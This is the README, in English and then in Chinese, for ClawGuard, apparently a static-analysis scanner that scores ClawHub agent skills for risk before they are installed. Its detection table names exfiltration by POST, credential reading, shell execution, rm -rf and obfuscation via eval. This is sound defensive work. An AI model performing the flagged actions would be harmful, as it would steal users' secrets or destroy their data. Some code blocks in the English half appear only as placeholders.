ClawGuard 🛡️
Scan ClawHub skills for security risks before installing.
ClawGuard performs static code analysis on ClawHub skills to detect:
- - 🌐 Network exfiltration (HTTP POST to external URLs)
- 🔑 Credential access (API keys, tokens, passwords)
- ⚡ Shell command execution
- 💥 File destruction (rm -rf, unlink)
- 🎭 Code obfuscation (eval, base64 decode)
- 👻 Hidden files and directories
Usage
Scan by skill name
Download and scan a skill from ClawHub:
�CODEBLOCK0
Scan local directory
Scan a skill directory on your local filesystem:
�CODEBLOCK1
JSON output
Get results in JSON format:
�CODEBLOCK2
Examples
Scan the GitHub skill:
�CODEBLOCK3
Scan a local skill:
�CODEBLOCK4
Risk Levels
- - 🟢 SAFE (0-30): No significant risks detected
- 🟡 CAUTION (31-60): Review flagged items before installing
- 🔴 DANGEROUS (61-100): High-risk patterns detected — DO NOT INSTALL
Exit Codes
- -
0: Safe - INLINECODE1�: Caution
- INLINECODE2�: Dangerous
Requirements
- - Python 3.11+
- INLINECODE3� (Python package manager)
- INLINECODE4� CLI (optional, for downloading skills)
How It Works
- 1. Pattern Matching: Regex-based detection of dangerous code patterns
- AST Analysis: Python AST parsing for eval/exec detection
- URL Extraction: Identifies all network endpoints
- Risk Scoring: Weighted severity scoring (0-100)
What It Detects
| Category | Weight | Examples |
|---|
| Network exfiltration | 25 | POST to unknown URL with data |
| Credential access |
20 | Reading API keys, tokens |
| Shell execution | 15 | exec(), subprocess, system() |
| File destruction | 15 | rm -rf, unlink, rmdir |
| Obfuscation | 15 | eval(), atob(), Buffer.from |
| Hidden files | 10 | Dotfiles, hidden directories |
Limitations
- - Static analysis only: Cannot detect runtime behavior
- Regex-based: May have false positives/negatives
- JS/TS: Basic pattern matching (no full AST parsing)
- Encrypted/minified code: Cannot analyze obfuscated payloads
Best Practices
- 1. Always scan before installing untrusted skills
- Review CAUTION-level findings manually
- Check network endpoints for unknown domains
- Never install DANGEROUS skills without verification
- Report suspicious skills to ClawHub moderators
License
MIT
技能名称: clawguard
详细描述:
ClawGuard 🛡️
安装前扫描ClawHub技能中的安全风险。
ClawGuard对ClawHub技能执行静态代码分析,以检测:
- - 🌐 网络数据外泄(向外部URL发送HTTP POST请求)
- 🔑 凭证访问(API密钥、令牌、密码)
- ⚡ Shell命令执行
- 💥 文件破坏(rm -rf、unlink)
- 🎭 代码混淆(eval、base64解码)
- 👻 隐藏文件和目录
使用方法
按技能名称扫描
从ClawHub下载并扫描技能:
bash
uv run {baseDir}/scripts/scan.py --skill <技能名称>
扫描本地目录
扫描本地文件系统中的技能目录:
bash
uv run {baseDir}/scripts/scan.py --path /path/to/skill
JSON输出
以JSON格式获取结果:
bash
uv run {baseDir}/scripts/scan.py --skill <技能名称> --json
示例
扫描GitHub技能:
bash
uv run {baseDir}/scripts/scan.py --skill github
扫描本地技能:
bash
uv run {baseDir}/scripts/scan.py --path ~/.openclaw/skills/my-skill
风险等级
- - 🟢 安全(0-30):未检测到重大风险
- 🟡 谨慎(31-60):安装前请审查标记项
- 🔴 危险(61-100):检测到高风险模式——请勿安装
退出代码
要求
- - Python 3.11+
- uv(Python包管理器)
- clawhub CLI(可选,用于下载技能)
工作原理
- 1. 模式匹配:基于正则表达式检测危险代码模式
- AST分析:Python AST解析,用于检测eval/exec
- URL提取:识别所有网络端点
- 风险评分:加权严重性评分(0-100)
检测内容
| 类别 | 权重 | 示例 |
|---|
| 网络数据外泄 | 25 | 向未知URL发送带数据的POST请求 |
| 凭证访问 |
20 | 读取API密钥、令牌 |
| Shell执行 | 15 | exec()、subprocess、system() |
| 文件破坏 | 15 | rm -rf、unlink、rmdir |
| 混淆 | 15 | eval()、atob()、Buffer.from |
| 隐藏文件 | 10 | 点文件、隐藏目录 |
局限性
- - 仅静态分析:无法检测运行时行为
- 基于正则表达式:可能存在误报/漏报
- JS/TS:基本模式匹配(无完整AST解析)
- 加密/压缩代码:无法分析混淆后的负载
最佳实践
- 1. 安装前务必扫描不可信技能
- 手动审查标记为“谨慎”的发现
- 检查网络端点中是否存在未知域名
- 未经验证绝不安装标记为“危险”的技能
- 向ClawHub管理员报告可疑技能
许可证
MIT
